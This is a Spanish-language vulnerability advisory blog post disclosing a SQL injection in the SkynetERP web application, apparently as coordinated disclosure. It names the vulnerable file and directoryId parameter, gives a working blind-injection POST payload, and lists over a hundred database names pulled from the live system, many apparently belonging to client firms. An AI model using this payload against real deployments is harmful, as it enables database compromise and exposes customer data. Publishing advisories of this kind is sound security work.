SkynetERP - SQL Injection Vuln.

Posteado por JP el 08/11/2018

Un ataque por inyección SQL consiste en la inserción o “inyección” de una consulta SQL por medio de los datos de entrada desde el cliente hacia la aplicación. Un ataque por inyección SQL exitoso puede leer información sensible desde la base de datos, modificar la información (Insert/ Update/ Delete), ejecutar operaciones de administración sobre la base de datos (tal como parar la base de datos), recuperar el contenido de un determinado archivo presente sobre el sistema de archivos del DBMS y en algunos casos emitir comandos al sistema operativo. Los ataques por inyección SQL son un tipo de ataque de inyección, en el cual los comandos SQL son insertados en la entrada de datos con la finalidad de efectuar la ejecución de comandos SQL predefinidos.(https://www.owasp.org/index.php/Inyecci%C3%B3n_SQL)

Documento:

SkynetERP - SQL Injection Vulnerabilities

Fecha de lanzamiento:

20 de Julio del 2018

Clase de vulnerabilidad:

SQL Injection

Producto e Introducción del Servicio :

Es un software ERP 100% web que cumple todos los aspectos tributarios y legales peruanos.Esta solución integra en un solo sistema, el manejo de las distintas áreas de tu empresa. Es la solución de Gestión Empresarial, que permite a las empresas evaluar, implementar y gestionar más fácilmente su negocio. (http://www.skyneterp.com/sobre-skynet.html)

Resumen de Asesoramiento:

El equipo de investigación de vulnerabilidades de RedSec descubrió una vulnerabilidad remota de inyección sql en el sistema denominado SkynetERP.

Producto(s) Afectado(s):

Skynet ERP

Técnica de Explotación:

Remota

Nivel de Severidad:

Alto

Tipo de Divulgación:

Divulgación Coordinada

Detalles Técnicos y Descripción:

La vulnerabilidad SQL Injection permite a atacantes remotos o cuentas de usuario con privilegios ejecutar comandos SQL maliciosos para comprometer el sistema de gestión de bases de datos y las aplicaciones web.

Las vulnerabilidades se encuentran en el parámetro directoryId del archivo /erpx/Componentes/c_socio_negocio/socio.negocio.services.php. Los atacantes con cuentas de usuario pueden ejecutar comandos sql maliciosos a través de la solicitud del método POST.

La explotación exitosa de la vulnerabilidad web resulta en el compromiso del sistema de gestión de bases de datos o aplicación web.

Exploit:

Parameter: MULTIPART directoryId ((custom) POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: --__X_REDSEC_BOUNDARY__
Content-Disposition: form-data; name="operation"

GET_D
--__X_REDSEC_BOUNDARY__
Content-Disposition: form-data; name="directoryId"

42835 AND 4768=4768
--__X_REDSEC_BOUNDARY__
Content-Disposition: form-data; name="companyId"

1
--__X_REDSEC_BOUNDARY__--

Bases de Datos Disponibles:

BDMaestra
chat
citrixdemo
controlx
cosac1
cxabt1
cxaceros
cxaires
cxalalau
cxalta
cxamerica
cxarnao
cxasp
cxaudio
cxautocons
cxayllu1
cxayllu2
cxayllu3
cxbelimoc
cxberazu
cxbonitel
cxbryam
cxcentell
cxcharito
cxcitrix3
cxcomex
cxcompustore
cxcopemina
cxcovema
cxdemoenterprise7
cxdeprove
cxdesign
cxdiocesis
cxeco
cxedinson
cxesttilo
cxeurolabs
cxfmrem1
cxfmrem2
cxforce
cxforperu
cxgdata
cxgescom
cxglm
cxgreen01
cxgrupo3r
cxids
cximfesa1
cximfesa2
cximfesa3
cximfesa4
cxinfiniti
cxintra2
cxisaias
cxjprehab
cxkinsa
cxlaser
cxleon
cxmalysac
cxmaqui
cxmarca
cxmarcaja
cxmarket
cxmatriz
cxmba
cxmegate
cxnadalco
cxnecssein1
cxntm
cxomnitec
cxordonez
cxPanzer
cxpequipo
cxplasticos
cxprovincia
cxroad
cxschulman
cxselect
cxsenati
cxshalos
cxshialer
cxsicma
cxsteel
cxtambo
cxtechlab
cxtecniases1
cxtecniases2
cxtubillas
cxuniversal
cxvalky
cxvalle
cxvea
cxysmar
cxyulio
cxzhara
electronic
gestionx
icx_covema
information_schema
invoice_db
libro_reclamacion
mysql
nodetest
performance_schema
skynet1

Timeline:

Descubrimiento del bug y primer contacto: 20 de Julio del 2018
Reporte del bug durante videollamada: 24 de Julio del 2018

Créditos y Autores:

Jorge Pacora [[email protected]]